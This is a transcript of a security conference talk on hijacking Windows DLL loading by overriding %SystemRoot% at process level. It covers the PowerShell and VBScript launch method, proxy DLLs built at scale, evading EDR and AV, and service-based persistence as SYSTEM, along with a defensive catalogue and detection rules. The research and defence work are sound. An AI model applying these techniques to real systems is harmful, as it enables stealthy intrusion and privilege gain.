So, coming up next is Wietze, and he is a new speaker. Lovely, good morning everyone. Welcome, you made it to the final day of DEF CON. I'm here to kick off track three this morning, and I'll be talking about DLL hijacking and how you can make it even more fun with environment variables. So, I'll quickly introduce myself. My name is Wietze, that's a Dutch name, but I currently live in London, in the UK, where I work for CrowdStrike as a senior threat hunter on the OverWatch Elite team. I have presented at some conferences before, amongst other things about DLL hijacking, and, as I was saying, today I'll be talking about how you can do that with environment variables. So, in order to get there, I'm going to give a quick recap of DLL hijacking and the variants you may be familiar with, then I'll give a quick intro on environment variables, and then later on we're going to bring them together and do some really cool stuff. So, let's crack on. DLL hijacking. There are a couple of different definitions for it, so I thought before I start, I might give you mine, so we're all clear what I mean by it. To me, DLL hijacking is tricking a legitimate, trusted, signed executable into loading an arbitrary DLL. There are multiple ways of doing that, but in essence, as you can see here on the diagram, you have a trusted program. It normally loads its libraries, the DLLs, and somehow you trick it into loading an evil DLL instead. From an offensive perspective, that is great because you don't have to run your own executable. You can leverage the reputation of the trusted program, and that allows you to get away with it if you're up against a really basic AV, or, if you're up against an EDR, to make your activity look a lot more legitimate than it actually is. As I was saying, there are multiple variants, and these are the most common ones. I think most of you may be familiar with DLL sideloading. That is a very simple one.
You basically have a vulnerable executable that loads DLLs in an unspecified way: it doesn't specify the full path, but a relative one. If you then move the vulnerable executable to an attacker-writable folder, put it next to a malicious DLL, and execute it, it will run your malicious code via this trusted program. So, yeah, DLL sideloading is, I think, by far the most common one. Another one is DLL search order hijacking. These two are often confused, to be honest. They both leverage the search order, but to me, DLL search order hijacking is when you leave the executable in its original place, Program Files or System32, and if it is vulnerable, it means you can put a DLL in a location that is searched before the actual DLL, which means you're literally hijacking the search order. These are much rarer, I think, than most people realize. There are a couple of good candidates, but there are way, way more DLL sideloading candidates. So, these are related but distinct techniques, and I think they are often confused. DLL substitution is one you really shouldn't forget about. It's super simple: just replace the legitimate DLL with a bad one. If you remember Stuxnet, this was literally part of the attack path. They replaced a legitimate DLL in System32 with a malicious one, and the malicious one inserted extra commands for the industrial control system. So, it is DLL hijacking, right? Maybe not super novel, but you are hijacking a legitimate application. So, those are the really common ones. I want to quickly touch on three less common ones, which again are all types of DLL hijacking. You may have heard of phantom DLL hijacking. This is when an application tries to load a DLL that doesn't exist at all, in which case you can put the DLL anywhere on the search order and it will load your DLL. So, that's a really simple one.
And again, there are very few candidates, but if you have a good one, it can sometimes lead to privilege escalation or proper persistence. There's also something called Windows SxS hijacking, or Windows side-by-side hijacking. I think in the past this was really confusing because it has the word "side" in it, so people thought, oh, this is DLL sideloading. I've only ever seen one documented case. Again, I don't think it's as prevalent as some people think it is. It basically relies on a specific mechanism in Windows called Windows side-by-side, and hijacks it that way. But again, I've only ever seen one properly documented case. And finally, a wider class: input-based hijacking. This is when you manipulate a registry key or a command line and, that way, manage to load a malicious DLL. Firefox, for example, still has an executable where, if you run it and specify a custom path on the command line, it will just load DLLs from that folder. So, you get a trusted Mozilla executable, and it will load the malicious DLL. So, that's all great, right? Six types of DLL hijacking. This has been around for years now, and there have been many great blogs and tools that can help you understand what it is and leverage it yourself, and as a result, we have techniques that are very well documented, very well researched, but also very well detected. It just means that if you do this, you might trick really basic AV and EDR, but it's less and less likely that you will get away with it. So, that raises the question: is there something we can do to still perform DLL hijacking, to still leverage the reputation of a trusted program, but in a better or stealthier way? That is where environment variables come in, and as I said, before I go straight into the hijacking bit, a bit of background, so we're all on the same page as to what environment variables are and why we have them in the first place.
Right, environment variables. You may have heard of them. If you use Linux or Unix-based systems, you probably use them very often. An environment variable is basically a dynamic value that can be used by running programs. As I was already alluding to, on Linux and Unix-based systems these are very prevalent in the shells: you use a dollar sign and then a variable name, and that allows you, in scripts or in your terminal, to set a variable once and then just reference it elsewhere and get its value. So, it's like a global variable, if you've ever done programming. In Windows, you've got this too. In the command prompt, you can set an environment variable and reference it using percent signs, so %VAR% gives you the variable's contents. What you would almost forget is that processes can also use them. You typically may use them just in a shell, but any process can, for example from C, call the function getenv with a variable name and it will give you the value as set in your environment, because after all, the environment is the scope of your system, or your shell. Again, it's quite an old technique, and I'll touch on that on the next slide, but a value is always stored as a string, typically even an ASCII string. So, you can put integers and booleans in there, of course, but you would have to convert or cast them yourself. It's basically always a string. Right, I don't mean to turn this into a proper history lesson, but just a bit of background to understand why we have environment variables and why we still have them in 2022. The first mainstream OS to have them was Version 7 Unix. They were the first mainstream OS to come up with this concept, so programs didn't have to bug users by asking every time: what is your username?
What is your home path? Instead, you just define it once, you run a script or program, and it knows what your username is. Very simple. That first appeared in the late 70s, and only a few years later, PC DOS 2.0 included the same technology: in the shell, you could define variables. You probably can't see it at the very back, but I've got a little excerpt of the documentation which basically sums up what it does. It says it's a dynamic variable: it will be replaced in a script if you use it, and you can use the set command to give it a name and a value and then leverage that. Right, then in the early 90s, Windows 3.1 introduced the Windows registry. If you've ever used Windows, you will be familiar with it; it's the central settings hive that Windows uses. And I think this is quite a pivotal moment for environment variables, because when you really think about it, environment variables are supposed to store information that programs can use, and the Windows registry does pretty much the same: it stores all sorts of system-level configuration settings as well as program-level configuration settings. And as we'll see later, environment variables nowadays live in the registry, which I find really interesting, because we still have environment variables, but if you think about it, you could have only the Windows registry and not need environment variables in Windows at all. Cool. Then, towards the end of the century, we already had lots of security vulnerability researchers identifying issues with environment variables. Windows defines a couple of them out of the box, for example the PATH environment variable, which you may have heard of, and which caused lots of trouble, lots of vulnerabilities.
So, the earliest I could find was from 1997, a sysadmin complaining about it not implementing security properly, and this person said: why would other application developers bother to support secure configurations if this is what they see coming out of Redmond? So, he was clearly not happy, and, well, we'll find out later what the people in Redmond did about this class of vulnerability. And then finally, at the end of the century as well, in 1999, the first ever CVEs were issued, and the first batch actually included at least one (I think it's two) environment variable-based security issue that led to privilege escalation. All right, so that was the history of environment variables in one minute, but let's now look at what they look like in Windows. Funnily enough, you can define as many environment variables as you want, but there is an upper limit on the combined size of the variable names and values. All the environment variables you define are stored in one massive concatenated string, and this string must not exceed 2^15 - 1 (32,767) characters in total. So, whilst that gives you some room, you can't put entire programs, base64-encoded, in there if you wanted to. As I already said, nowadays the environment variables that you get when you start your computer are stored in the Windows registry. So, what happens when you start your computer? Windows, as the parent of everything, looks up the system-level environment variables in the registry key you see on screen, which lives under HKEY_LOCAL_MACHINE. These are the variables that apply to every user, all services, and all service accounts. This is how your system is initialized. When you then log in, it looks up the user-specific environment variables, which are stored under HKEY_CURRENT_USER. There's also something called the current session.
I'm not really going to talk about that today, but it also loads variables that are defined just for the duration of your session. So, if you log in and set an environment variable at that level, it will live just for that session, and as soon as you log off, it disappears. And then the final thing, which you would almost forget, is that environment variables also live at process level. So, you can define an environment variable that is only active within a single process: not its parents, not its siblings, just that one process. What normally happens in Windows when you start a new process is that the environment variables the new process gets are the same as its parent's environment variables. So, it just keeps passing down the environment variables, and because it's quite an old technology and most software doesn't really use it much, the values are passed down unchanged. So, you will have very consistent environment variables across the board. If you know how processes work in Windows, you might be familiar with the process environment block. This contains all sorts of information about the process. If you look, for example, at the process parameters struct, you see lots of the usual suspects, information you would expect for a process, like the command line, standard in and out handles, and the current path, but there's also a block for environment variables. And as you see here, this is from my demo lab; this is what you get out of the box when you install Windows. This is Windows 11. These are all default environment variables that programs might use to, for example, find out where your AppData folder is or what your drive letter is. Normally it's C, but you can change it in the settings, and then your program might use that and adjust accordingly. But the interesting thing, and maybe you knew it, but it didn't really click for me, is that this exists at process level. Every process has this massive list of environment variables.
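To make that concrete, here is a minimal, cross-platform Python sketch (the variable name DEMO_VAR is made up for illustration): every process can read its own environment block, and a child spawned from it inherits a copy of that block unchanged.

```python
import os
import subprocess
import sys

# Every process carries its own environment block; os.environ is
# Python's view of it (os.getenv mirrors C's getenv()).
os.environ["DEMO_VAR"] = "inherited-from-parent"
print(os.getenv("DEMO_VAR"))  # inherited-from-parent

# A child process gets a copy of the parent's block by default,
# so it sees the same value without us passing anything explicitly.
child = subprocess.run(
    [sys.executable, "-c", "import os; print(os.environ['DEMO_VAR'])"],
    capture_output=True, text=True,
)
print(child.stdout.strip())  # inherited-from-parent
```

This pass-down-unchanged behaviour is exactly why environment variables stay so consistent across a Windows process tree.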
You can change it at process level. So, if you look, for example, in the Windows API, this is one of the ways in which you can create a new process. You can see that you pass the application name and command line, but you can also optionally pass custom environment variables. So, you can overwrite existing ones or add new ones, and that allows the program to leverage them to, I don't know, find a path or find your username, whatnot. So, that begs the question again, from a hacker's mindset: is there now scope for tampering? We've looked at DLL hijacking. We've looked at environment variables. Is there a way in which we can combine these two concepts? Because if you know environment variables, there are a couple of really interesting ones that are used quite often, and they link to paths that you normally don't control. If you've just got a foothold on a machine and you don't have admin permissions, you can't write to the C:\Windows folder, for example. So, the SystemRoot environment variable, which points to C:\Windows, is an interesting one. Is there a way in which, at process level, we could change it and maybe trick a vulnerable executable into loading something that lives in a folder that I control? It's the same with SystemDrive, or the Windows directory variable, which is basically an older version of SystemRoot, and the same with the Program Files folders. So, if there are still applications using environment variables, is there scope for us to tamper with that? So, that's how I started. The basic concept: you pick an application you want to test to see if it's vulnerable. You update one of these environment variables I was just talking about, and instead of the original folder, you point it to a temp folder or, I don't know, some folder you control. You start the application, and using, for example, Procmon, you just check: is this application now checking the folder I specified?
Because I updated the environment variable, and then, well, hopefully, profit. So, if you look at the diagram over there, at the top is a normal run of this trusted program: it might try to load a DLL from a location using some variable, and normally that would resolve to a legitimate path under C:\, plus the name of the DLL. What I'm proposing is manipulating that. At process level, we change the environment variable to, say, an evil path, and then, hopefully, when it runs, it will load the DLL from my location instead. And if the application is naive enough not to check the signature or do some other form of verification, it might now load my DLL, and that would mean a new type of DLL hijacking. So, this is a working example. This is an example that I found in the System32 folder: you've got an executable called hostname. It's a very simple, very boring one; it just prints the hostname, the name of your computer. But it turns out that if you run it, just without any command line arguments, just hostname, it will load, I think, three DLLs, one of which is the one you see here. It tries to load a DLL dynamically from the system root folder, and then System32, and, what is it, mswsock.dll. So, normally, that means it will load it from C:\Windows\System32\mswsock.dll. However, if I now change the environment variable with the PowerShell that you see there at the bottom of the screen, I can alter the path and trick it into loading my DLL. There are a number of ways in which you can do this; this is a way of doing it in PowerShell. It uses the CLR. Very simply put, you define a new object and point it to the original binary. We don't need to move hostname, we don't need to do anything special. We just say: this is the executable I want to run. I then remove the SystemRoot variable, and I then add it again with a new path.
So, the new path is now C:\temp\evil, and the remaining code is just getting the new object ready and starting the new process. Right, demo time. First of all, here I'm showing that I have this temp\evil folder and that I've got this DLL in place: I created a subfolder called System32 with the DLL in there. Now, based on the code I just described, hopefully when I run it, it should give some sort of visual feedback, but also, at the top, you see Procmon running. So, hopefully, that will also demonstrate that it loaded the DLL from my location, not from System32. Well, you might not be able to see it, but it popped a window that said "Hello, DEF CON". And of course, it popped calc, because otherwise you wouldn't know I did something bad. So, there's calc. And in the Procmon window, you can now see, again, it might be a bit too small, but it's basically confirming that the executable is in the expected location, yet it loaded my DLL from my temp location, the folder we just looked at. So, a bit of a recap, because, okay, fine, I popped calc, big deal. Why should we care? The great thing is that from an offensive point of view, you only need to bring the DLL, because hostname is already on the machine. You just start a new process and update a variable, which means you don't need to bring in your own executable, which is typically the case for DLL sideloading. There are also no special command lines involved. You don't need to, I don't know, suspend the process when you start it. As you've seen, it's just a couple of lines in PowerShell; it's pretty straightforward. And one thing I really want to emphasize: environment variables are defined in the registry, but what we just did, we didn't change the registry. We just started the process and told it to override the environment variables it was aware of. So that means there is no registry footprint.
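That no-registry-footprint point can be sketched cross-platform in a few lines of Python. This is a hedged analog, not the talk's actual tooling: subprocess's env parameter plays the role of the custom environment block you hand over at process creation, and SystemRoot / C:\temp\evil are just the illustrative values from the demo.

```python
import os
import subprocess
import sys

# Build a modified copy of our environment block. Only the child
# will see the override; the parent process and the registry are
# left completely untouched.
evil_env = os.environ.copy()
evil_env["SystemRoot"] = r"C:\temp\evil"

# The child resolves the variable to the attacker-chosen folder...
child = subprocess.run(
    [sys.executable, "-c", "import os; print(os.environ['SystemRoot'])"],
    env=evil_env, capture_output=True, text=True,
)
print(child.stdout.strip())  # C:\temp\evil

# ...while our own process still holds the original value (or no
# value at all on non-Windows systems).
print(os.environ.get("SystemRoot", "<unset>"))
```

On a real Windows target, the equivalent override via CreateProcess's environment block is what redirects the vulnerable executable's DLL lookups.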
If anything, if I were to change the environment variable in the registry, if I changed SystemRoot there, it would break my entire system, because so many programs use it; it would not find DLLs, it would just make your computer unbootable. So we don't want that. We changed it at process level, and, well, we've shown it worked. Also, from an AV and EDR perspective: they can see environment variables at process level, but very rarely, in my experience, do they actually hunt for them, or are you able to write rules for them. So that means you might get away with it, because the really obvious things, like command line and registry artifacts, are not there. And yeah, as I said, this was an example with PowerShell, but you can also do it with VBScript or JScript. You could literally write a macro that does this in a very stealthy way. And you use legitimate processes: with some DLL hijacking, you would have to run a process from a temp folder, but here you just run a process from System32. Again, you might get away with that. You could of course also do it from an executable itself; you could write some C code to launch a process with a different environment variable, but that sort of defeats the whole point. So having these scripting languages support this makes it really powerful. This is just a static screenshot of how you might do it in VBScript. You see the command prompt, which is just executing the VBScript file. On the right-hand side, you see the VBScript code. It's only four lines; you could actually do it in three if you group some stuff together. And then at the bottom, you see how it worked. If you look at the VBScript code, it just asks for the process-level variables, it updates SystemRoot, again changing it to a temp folder, and then, in this case, it runs another executable, slui.exe.
And then at the bottom, you see the evidence that it loaded not one, but actually three DLLs from my folder. You might also see that cscript itself loaded two DLLs from my folder. So that's something to be aware of: with some scripting languages, if you change the environment variable at process level, the interpreter will start using it itself too. So if cscript needs a DLL and it relies on the same variable, it might actually break. There's a way of working around this, by the way, but I did want to point out that it doesn't come without challenges, and it's funny how different languages implement it in different ways. Cool, so a final recap for the technique itself. I already alluded to most of these. DLL sideloading: you need to bring an executable; we don't need that. DLL search order hijacking: again, I think there are fewer candidates than most people realize, there are only a few really obvious ones, which means detection is easier. In this case, as I will show shortly, there are many candidates you can choose from. And the same with DLL substitution or input-based DLL hijacking: they all come with extra steps that just mean you are more likely to be picked up. We don't have any of that. There are a couple of downsides, but I think the main footprint that you have with this technique is the planting of the DLL: at some point, you need to put that DLL in the folder it's going to be loaded from. But if you think about it, you're always going to have that with DLL hijacking: you need to execute a DLL, so it needs to live somewhere on disk. Again, if you compare it to the other DLL hijacking variants, this one is rather stealthy. That doesn't mean it's undetectable, but it's doing a better job, I think. Cool, so far I've only told you about one or two executables, which were a bit anecdotal. How do you find which ones are vulnerable? So again, we get into the hacker's mindset.
How would you turn this single observation into a systematic approach? So here's an idea. I define a scope for the executables and DLLs I want to test. In this case, I just looked at all the DLLs that live in the System32 folder. What I did is create implants for each and every one of them; how I did that I'll show shortly, but basically every DLL gets its own clone, and whenever it's loaded, it writes a fingerprint file to disk. A fingerprint file is literally just an empty text file, but the file name tells you which DLL was loaded and which process loaded it. I will show an example of that in a bit, but basically it means that if my DLL was loaded successfully, I will have evidence in the form of a fingerprint file, which guarantees that my code was loaded and executed. So that's the prep. Then we go to the execution. Now I have thousands of DLLs, because in System32 there are a lot of DLLs. I now need to define the scope for the applications I want to test. Say, again, we use System32: we just do a wildcard search for all the executables in there. What I then do is run each and every executable, one by one, but with the updated environment variable, very similar to the PowerShell script I just showed you. In that case, I just ran one, but you turn it into a for loop and iterate over the executables, pointing the variable to the folder with all these thousands of implants. And then hopefully, if they work, we can validate it by looking at the fingerprint files. These will tell me which executables worked and which DLLs were loaded, and that means we can use them in proper attacks. Right, some of you may have actually done DLL hijacking before, because it's very similar across these different variants, and there are a couple of challenges there, stability being the main one.
If you just generate a dummy DLL that has a DllMain and nothing else, it typically does not get loaded by the vulnerable application. Typically, applications rely on the exports, you know, the export table that tells you which functions you can call. So if those are not present, the executable might reject the file. It might actually become unstable or give some visual feedback, and that means you can't really use it for an attack. A great way to overcome that is to use DLL proxying, or function redirection. The great thing about PE files is that you can define exports, these public-facing functions you can call, and you can actually point these exports to external files. Through that, my implant can leverage the legitimate functionality: the DLL would literally do the same thing as the genuine one, but still include my malicious code. So let me quickly show you how this works in the context of this attack. Here we have our legitimate application again, and imagine it is trying to load somedll.dll. That's the implant I created, and in this case, it is a clone of a DLL that has two exports, exportA and exportB. Now, to generate an implant, I don't want to reverse engineer this DLL; that's going to cost way too much time, and I already said there are thousands of DLLs, so that does not scale. So instead, in my implant I just say: well, I have an exportA and I have an exportB, but the functionality lives elsewhere, over here, and then you point it to the legitimate location. So here, at the bottom right, you see my fake path again, and I say: if you call exportA, please go to C:\Windows\somedll.dll, that's where you find it. And that means that whenever the executable loads my DLL, it runs my code, but whenever it calls a function, it goes to the legitimate DLL.
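To give a feel for what those redirection rules can look like, here is a small Python sketch that emits MSVC-style module-definition (.def) forwarder entries; the "name = module.name" form is the linker's export-forwarding syntax, the export and module names below are the placeholders from the diagram, and other toolchains express the same idea slightly differently.

```python
def make_forwarding_def(library, exports, real_module):
    """Build .def content in which every export of the implant is
    forwarded to the genuine module, so callers still reach the
    original functionality while the implant's own code runs on load."""
    lines = [f"LIBRARY {library}", "EXPORTS"]
    for name in exports:
        # "name = module.name" tells the linker to emit a forwarder.
        lines.append(f"    {name} = {real_module}.{name}")
    return "\n".join(lines)

# The two placeholder exports from the diagram, forwarded to a copy
# of the genuine DLL (the module name here is illustrative).
print(make_forwarding_def("somedll", ["exportA", "exportB"], "somedll_orig"))
```

In real tooling, the export list would be scraped from the genuine DLL's export table rather than hard-coded.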
So that is great, because it means the program is less likely to break, so it's more likely to accept my DLL, and therefore I can more reliably perform DLL hijacking. So there was one issue, reliability, and with DLL proxying you already cover most of that. But some executables also use DLLs to get things like image files or cursor files, any sort of resources; you can embed these in PE files. So another issue is that if your implant doesn't have these, the executable might break. Again, to maximize the number of targets I could find, I also implemented resource cloning, meaning it literally just copies the resource section to the new DLL. And again, that further increases the number of executables that you can choose from. Great, so this is what it looks like. This is a bash script; I'll be releasing it later today. It uses all sorts of open source tools, but basically it looks at the legitimate DLL, it looks at the export table, it copies it, it creates these redirection rules, and it copies the resource section as well. By the end, you have an implant DLL with your malicious code, with these function redirections, as well as the cloned resources. So in my test, with the scope and everything we were just talking about, this is literally the main code of the DLL. As you see, it's nothing fancy. It basically says: whenever I'm called with a process attach or thread attach action, call generate fingerprint with the name of the executable that ran me. And as I already said, that function is literally just creating a text file named with first the name of the DLL, then the name of the executable, and if the file is there, it's proof that it worked. This is then how you would run it. So I now have thousands of DLL files, and this is the PowerShell script I was talking about. It's a modified version of the one we looked at in the demo.
As I said, it's just a for loop. It iterates over everything in the System32 folder, changes the environment variable, pointing it to the folder with all the DLL implants, and then just runs the executables one by one. And then hopefully, if you run that, you get lots of these fingerprint files. So when I ran it on the latest version of Windows 11 that I could get hold of, this is what happened. This is the output folder. It's probably too small for the people at the back, but you see, for example, one executable that loaded one of my cloned System32 DLLs. And the fact that the file is there, it's just an empty text file, means that my code was loaded; it was successful. As you may be able to see from the scroll bar, there are quite a few text files in there, so there are quite a few options you have to get this to work. What I'm releasing today is the code that I used, so you can use it for your own research. I've only focused on the System32 folder, but if you want to leverage any of this yourself, including the function redirection and the resource cloning, you can find it on my GitHub page; that's live now. I've used it on Linux, but it uses MinGW, so you should be able to use it on Windows as well. And yeah, let's now take a look at some of the results, because you saw these fingerprint files, but what does that really mean? In the scope that I tested, the System32 folder on Windows 11, I found 82 unique executables that load 91 unique DLLs. And because most executables load multiple DLLs, there are actually nearly 400, 398 to be exact, unique combinations. So that's quite a few options, right? To my earlier point: with DLL search order hijacking, you can usually only choose from a couple, but here you've got about 400 out of the box on Windows 11. Then I did some spot checking on other tools, some very common enterprise tools like Office, so I tested Word, PowerPoint, Excel.
Again, all of these are vulnerable to this type of DLL hijacking. They load at least one, but usually five or six DLLs this way, and if you change the SystemRoot variable, you can trick them into loading your malicious DLL. The same goes for web browsers; I tried Edge, Chrome, Firefox. I tested communication software like Teams and Zoom. All of these are vulnerable. And to me that shows the point: the number of 400 is great and sounds really cool, but the overarching point is that it's not about these individual tools. It's a wider problem. Applications rely on the SystemRoot variable and some others, they don't properly validate what they load, and that means there are just many, many results. So this is a whole new class of DLL hijacking that we can now leverage. Cool, then before I go to the next section, some quick remarks on how we can take this further. So far we've only looked at execution, which is what you normally do anyway with DLL hijacking. But is there a way in which we can use this more persistently, for example? Well, that is a bit of a challenge, because we need to start the process with the updated environment variables, and we already said we don't want to change the current-user or local-machine ones, because that would break everything. So how do you start a process in a way that keeps these overridden environment variables? That is quite tricky. To my knowledge, you can't do it with a .lnk file, for example. You could of course just use the PowerShell script or VBScript and run that persistently, but that is not really persistence, is it? It sort of defeats the whole point; you might as well do the bad stuff in the script itself. What you could do, however, if you already have admin, if you already have elevated privileges, is change a service. A Windows service is like a daemon on Linux; it allows you to start stuff persistently.
So the screenshot you see here is from the print spooler, which is started by default on Windows 11 installations. There is a very underused or underutilised registry value you can set, called Environment. As you can guess, you can literally just specify environment variables in there, and they will be used in the scope of that service. So in this case, the print spooler, I just set SystemRoot once again, pointed it at my folder with all my implants, and, well, what do you think is going to happen if I restart the service or reboot the machine? Sure enough, it loaded one of my DLLs — the same one again, mswsock. The great thing, however, is that it now also runs as SYSTEM. Most Windows services — not all of them, but most — run either with a service account or as SYSTEM. So it's not really privilege escalation, of course, but if you are admin and you want to elevate yourself to SYSTEM in a stealthier way, this is a cool way of doing it. Because you could argue, if you already have admin, you might as well just change the command of the service. But that is something that EDR and AV typically pick up on, whereas this is maybe something that isn't really monitored. And again, if you implement the DLL properly, the print spooler service will still work — it just also executes your malicious code. So there's less scope for breaking stuff, and therefore it's stealthier. But coming back to privilege escalation: can you do real privilege escalation with this, or even a user account control bypass? Now, this is where we come back to that earlier comment on security in Microsoft's design. In the Windows API, you generally have two ways of spawning a new process: CreateProcess and ShellExecute. The former cannot run programs with more privileges than yourself. So if you are medium integrity, you can't get it to run something at high integrity without doing something weird.
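The per-service Environment value described above is a documented REG_MULTI_SZ value under the service's key. A minimal sketch of writing it, assuming the print spooler as the target and a hypothetical implant path; this needs admin rights and is guarded so it only runs on Windows:

```python
import sys

# Registry key for the print spooler service.
SERVICE_KEY = r"SYSTEM\CurrentControlSet\Services\Spooler"

def environment_value(implant_dir):
    """Build the REG_MULTI_SZ data for the service's 'Environment' value.

    Each entry is 'NAME=value'; here we only override %SystemRoot%,
    scoped to this one service rather than the whole machine.
    """
    return ["SystemRoot=" + implant_dir]

def set_service_environment(implant_dir):
    """Write the per-service environment override (requires admin)."""
    import winreg  # Windows-only; imported lazily on purpose
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICE_KEY, 0,
                        winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, "Environment", 0, winreg.REG_MULTI_SZ,
                          environment_value(implant_dir))

if __name__ == "__main__" and sys.platform == "win32":
    set_service_environment(r"C:\research\implants")  # hypothetical path
```

On the next service restart or reboot, the service control manager applies these variables to the spawned service process, which is what makes the implant load as SYSTEM.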
ShellExecute can, but whenever you do that, it does not take your process-level environment variables. This seems to be a very conscious decision by Microsoft to limit the scope for privilege escalation. Any process that runs with a higher integrity level than the one it was spawned from will generally just reset the environment variables to the ones defined at system level, or at whichever level applies. This seems to be a reaction to that PATH environment variable issue we mentioned at the very start. That caused a lot of trouble in the past, and Microsoft decided, no, we're going to implement it this way, and that means there is less scope for environment-variable-based privilege escalation. And you've got to give it to them, because in this case it does work — it does hold us back. It means we can't do a user account control bypass in the traditional way. What I will say, however, is that there are a couple of anecdotal instances where the executable that is spawned is known to override this behaviour. There are one or two that I've seen that, even though they are spawned at a higher integrity level, still manually copy back the environment variables of the parent process, sort of overriding this behaviour. If that is the case, you could of course still use this technique for privilege escalation. Okay, right, some final remarks. What does this mean? We've now looked at a new type of DLL hijacking; there are a couple of other ones. What does the future hold? I think the bottom line — what I'm really trying to say here — is that DLL hijacking is not going to go away. Even if we magically fixed all these issues, including the other variants, we would still have to deal with it, because attackers could still bring back these older versions. I could copy these Windows 11 executables now, bring them to a fully patched system, and you would still have to deal with the problem, because they're still signed, still trusted, and still vulnerable.
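The CreateProcess side of this distinction is easy to verify yourself. A minimal sketch, with a hypothetical override path: a child spawned with an explicit environment block (which is what `subprocess` does under the hood via CreateProcess) inherits the overridden %SystemRoot%, whereas an elevated ShellExecute launch gets a freshly rebuilt environment.

```python
import os
import subprocess
import sys

def child_systemroot(override=r"C:\research\implants"):
    """Spawn a child the CreateProcess way and read back what
    %SystemRoot% looks like from inside the child process."""
    env = dict(os.environ)
    env["SystemRoot"] = override  # process-level override only
    out = subprocess.run(
        [sys.executable, "-c", "import os; print(os.environ['SystemRoot'])"],
        env=env, capture_output=True, text=True, check=True)
    return out.stdout.strip()

# An elevated launch would instead go through ShellExecuteW, e.g.:
#   ctypes.windll.shell32.ShellExecuteW(None, "runas", exe, None, None, 1)
# Windows then rebuilds the environment for the new high-integrity
# process, discarding the process-level override -- which is exactly
# what blocks the straightforward UAC-bypass route described above.
```

Running `child_systemroot()` shows the override surviving into the same-integrity child; the ShellExecuteW path in the comment is the one where it does not.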
So I think we need to learn to live with DLL hijacking. From an offensive point of view, it's all about making it stealthier; from a defensive point of view, it's all about limiting the scope. So in order to aid with that, over the last few months I have tried to document all the DLL hijacking types I could find and centralise them in a curated repo. As of this morning, you can go to hijacklibs.net — you get a nice portal there — and you can find not only the environment-variable DLL hijacking cases I've been talking about so far, but also the other ones: sideloading, phantom DLL hijacking, search order hijacking. As I said, I'm trying to make it more central. All the entries there have public resources, so they have been blogged or tweeted about before, but I'm trying to bring them together so we can get a better idea of the scope, and so you can use it all to defend against this, if that's what you're after. It's an open-source project, and I really hope that as a community we can keep adding to it, to raise awareness — again, both offensively and defensively, because I think there's a lot we can learn from each other there. So, very basically, how does it work? I've got a bit of a demo as well. Every vulnerable DLL has its own entry; it breaks down the types of DLL hijacking, so it could be environment-variable based, it could also be sideloading — sometimes it's both. It tells you where the DLL is normally located, where the executable is normally located, and for the blue-team side you also get some very basic detection logic that you could leverage. So let's take a quick look. There we go. On the front page it lists a couple of new entries. You can also browse by vendor. In this case, I'm going to look up a specific DLL I'm interested in. It tells me there are two types of DLL hijacking for it: search order hijacking and sideloading.
It gives me the resources — if there's a blog or a tweet, that can be really useful. As I said, you can see the paths where you would normally find it, and it tells you which executables are vulnerable as well. Here you see some Sigma code; that's an open-source format for defining detection rules. If I then look at a specific vendor — this is Trend Micro — I can see some other things as well. This is a type of phantom DLL hijacking that actually had a CVE, and it tells you how you can use it for privilege escalation. Again, this is all public information that has all been talked about before, but it helps you understand what options you have. If you very quickly want to see everything, just type .exe and you get all the mappings between a DLL and the vulnerable executables you could leverage for it. And yeah, that's the end of the demo. So, as I was saying, about to wrap up: it's now live, hijacklibs.net. It's an open-source project; it's all on GitHub, and it's hosted on GitHub as well. So if you have any new entries, or if you want to improve it or help keep this project going, please do contribute. If you go to the website, there is a link to the repo where you can find more. And that is what I had to share with you today. I really hope that was useful. If you have any feedback, come find me afterwards here at the stage, or follow me on Twitter — my DMs are open, at Vita. And thank you very much for showing up on Sunday morning.